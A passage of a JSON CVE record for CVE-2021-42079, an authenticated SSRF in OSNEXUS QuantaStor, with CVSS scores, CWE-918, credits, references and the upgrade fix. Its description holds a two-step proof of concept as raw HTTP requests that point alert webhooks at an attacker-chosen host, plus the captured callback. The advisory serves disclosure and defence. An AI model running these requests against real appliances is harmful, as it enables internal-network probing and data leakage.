\u0027790\u0027\\n\\n\u2003}, \\n\u2003\u0027args\u0027: ImmutableMultiDict([]), \\n\u2003\u0027form\u0027: ImmutableMultiDict([]), \\n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \\n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \\n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\\n}\\n\\n#### END FLASK REQUEST STUFF 
#####\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"csirt@divd.nl\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N\",\"baseScore\":6.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.7,\"impactScore\":4.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":4.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.2,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"csirt@divd.nl\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.0.0.355\",\"matchCriteriaId\":\"5E101217-36C7-4C28-8C61-7744481D2D0E\"}]}]}],\"references\":[{\"url\":\"https://cisrt.divd.nl/DIVD-2021-00020/\",\"source\":\"csirt@divd.nl\"},{\"url\":\"https://csirt.divd.nl/CVE-2021-42079\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.osnexus.com/products/software-defined-storage\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Product\"]},{\"url\":\"https://www.wbsec.nl/osnexus\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Third Party 
Advisory\"]},{\"url\":\"https://csirt.divd.nl/CVE-2021-42079\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.divd.nl/DIVD-2021-00020\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.osnexus.com/products/software-defined-storage\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://www.wbsec.nl/osnexus\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.wbsec.nl/osnexus\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"https://www.divd.nl/DIVD-2021-00020\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"tags\": [\"product\", \"x_transferred\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42079\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T03:22:25.855Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2021-42079\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-04T20:06:08.530050Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-04T20:06:13.510Z\"}}], \"cna\": {\"title\": \"SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355\", \"source\": {\"discovery\": \"INTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Wietse Boonstra (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Frank Breedijk (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Victor Pasman (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Victor Gevers (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Max van der Horst (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"C\\u00e9listine Oosting (DIVD)\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", 
\"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"OSNEXUS\", \"product\": \"QuantaStor\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"6.0.0.355\", \"versionType\": \"semver\"}], \"platforms\": [\"Windows\", \"Linux\"], \"collectionURL\": \"https://www.osnexus.com/downloads\", \"defaultStatus\": \"unknown\"}], \"solutions\": [{\"lang\": \"en\", \"value\": \"Upgrade to the latest version of OSNEXUS QuantaStor.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Upgrade to the latest version of OSNEXUS QuantaStor.\", \"base64\": false}]}], \"references\": [{\"url\": \"https://www.wbsec.nl/osnexus\", \"tags\": [\"third-party-advisory\", \"technical-description\"]}, {\"url\": \"https://cisrt.divd.nl/DIVD-2021-00020/\", \"tags\": [\"third-party-advisory\", \"exploit\", \"technical-description\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"tags\": [\"product\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42079\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. 
This is exclusively with POST requests.\\n\\nPOC\\n\\nStep 1: Prepare the SSRF with a request like this:\\n\\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 0\\n\\nStep 2: Trigger this alert with this request\\n\\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\n\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 1\\n\\nThe post request received by \u003cTARGET\u003e looks like this:\\n{\\n\\u2003\\n### Python FLASK stuff ####\\n\\n\\u2003\u0027endpoint\u0027: \u0027index\u0027, \\n\\u2003\\n\u0027method\u0027: \u0027POST\u0027, \\n\\u2003\\n\u0027cookies\u0027: ImmutableMultiDict([]), \\n\\u2003\\n### END Python FLASK stuff ####\\n\\n\\u2003\\n\u0027data\u0027: b\u0027{ \\n\\u2003\\u2003\\\"attachments\\\": [ 
\\n\\u2003\\u2003\\u2003{\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"fallback\\\": \\\"[122] test / test.\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"color\\\": \\\"#aa2222\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"[122] test\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"text\\\": \\\"test\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"fields\\\": [ \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Alert Severity\\\",\\n     \\u00a0 \\u00a0\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"CRITICAL\\\",\\n     \\u00a0 \\u00a0\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \\u00a0\\n\\u2003\\u2003\\u2003\\u2003\\u2003}, \\u00a0{ \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Appliance\\\", \\u00a0 \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"quantastor (https://\u003cHOSTNAME\u003e)\\\",\\n  \\u00a0 \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003}, \\u00a0{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System / Driver / Kernel Ver\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003}, \\u00a0{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System Startup\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"Fri Aug \\u00a06 16-02-55 2021\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003     }, \\u00a0{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"SSID\\\", \\u00a0 
\\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"f4823762-1dd1-1333-47a0-6238c474a7e7\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003},\\n\\u2003\\u2003\\u2003\\u2003],\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"footer\\\": \\\"QuantaStor Call-home Alert\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"footer_icon\\\": \\\" https://platform.slack-edge.com/img/default_application_icon.png \\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"ts\\\": 1628461774\\n\\u2003\\u2003\\u2003}\\n\\u2003\\u2003], \\n\\u2003\\u2003\\\"mrkdwn\\\":true \\n\\u2003}\u0027, \\n\\u2003#### FLASK REQUEST STUFF #####\\n\\n\\u2003\u0027headers\u0027: {\\n\\n\\u2003\\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \\n\\u2003\\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \\n\\u2003\\u2003\u0027Accept\u0027: \u0027*/*\u0027, \\n\\u2003\\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \\n\\u2003\\u2003\u0027Content-Length\u0027: \u0027790\u0027\\n\\n\\u2003}, \\n\\u2003\u0027args\u0027: ImmutableMultiDict([]), \\n\\u2003\u0027form\u0027: ImmutableMultiDict([]), \\n\\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \\n\\u2003\u0027path\u0027: \u0027/payload/58\u0027, \\n\\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\\n}\\n\\n#### END FLASK REQUEST STUFF #####\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. 
This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eHTTP/1.1\\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\\n\u003cbr\u003eAccept: */*\\nAccept-Language: en\\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\\nConnection: close\\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\\n\u003cbr\u003eAccept: 
*/*\\n\u003cbr\u003eAccept-Language: en\\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\u003cbr\u003eConnection: close\\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e{\u003cbr\u003e\\u2003\\n### Python FLASK stuff ####\\n\u003cbr\u003e\\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\\u2003\\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\\u2003\\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\\u2003\\n### END Python FLASK stuff ####\\n\u003cbr\u003e\\u2003\\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\\u2003\\u2003\\\"attachments\\\": [ \u003cbr\u003e\\u2003\\u2003\\u2003{\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"fallback\\\": \\\"[122] test / test.\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"color\\\": \\\"#aa2222\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"[122] test\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"text\\\": \\\"test\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"fields\\\": [ \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Alert Severity\\\",\\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"CRITICAL\\\",\\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \u0026nbsp;\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Appliance\\\", 
\u0026nbsp; \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e)\\\",\\n  \u0026nbsp; \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System / Driver / Kernel Ver\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System Startup\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"Fri Aug \u0026nbsp;6 16-02-55 2021\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003     }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"SSID\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"f4823762-1dd1-1333-47a0-6238c474a7e7\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003},\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003],\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"footer\\\": \\\"QuantaStor Call-home Alert\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"footer_icon\\\": 
\\\"\u003c/span\u003e\u003ca target=\\\"_blank\\\" rel=\\\"nofollow\\\" href=\\\"https://platform.slack-edge.com/img/default_application_icon.png\\\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"ts\\\": 1628461774\u003cbr\u003e\\u2003\\u2003\\u2003}\u003cbr\u003e\\u2003\\u2003], \u003cbr\u003e\\u2003\\u2003\\\"mrkdwn\\\":true \u003cbr\u003e\\u2003}\u0027, \u003cbr\u003e\\u2003#### FLASK REQUEST STUFF #####\\n\u003cbr\u003e\\u2003\u0027headers\u0027: {\\n\u003cbr\u003e\\u2003\\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\\u2003\\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\\u2003\\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\\u2003\\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\\u2003\\u2003\u0027Content-Length\u0027: \u0027790\u0027\\n\u003cbr\u003e\\u2003}, \u003cbr\u003e\\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918 Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"b87402ff-ae37-4194-9dae-31abdbd6f217\", \"shortName\": \"DIVD\", \"dateUpdated\": \"2025-09-22T06:40:03.059Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2021-42079\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-22T06:40:03.059Z\", \"dateReserved\": \"2021-10-07T17:12:57.677Z\", \"assignerOrgId\": \"b87402ff-ae37-4194-9dae-31abdbd6f217\", \"datePublished\": \"2023-07-10T06:29:48.339Z\", \"assignerShortName\": \"DIVD\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

